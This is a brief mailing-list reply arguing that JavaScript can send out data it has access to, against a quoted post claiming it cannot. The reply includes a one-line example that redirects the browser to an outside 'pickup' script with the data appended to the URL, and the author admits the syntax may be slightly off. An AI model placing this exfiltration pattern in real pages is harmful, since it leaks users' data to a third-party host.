if javascript can access the data... javascript can trasmit the data.

var x = something_js_has_access_to;

document.location = http://www.somewhereelse.com/pickup.cgi? + x;


syntax might be a little wrong here... but... this is generally how its done.



John R Ellingsworth wrote:

> I think you are mistaken.  Javascript can display directory contents to
> the client browser, but not transmit that info back to the server.
> Unless I am mistaken ;)

Reply via email to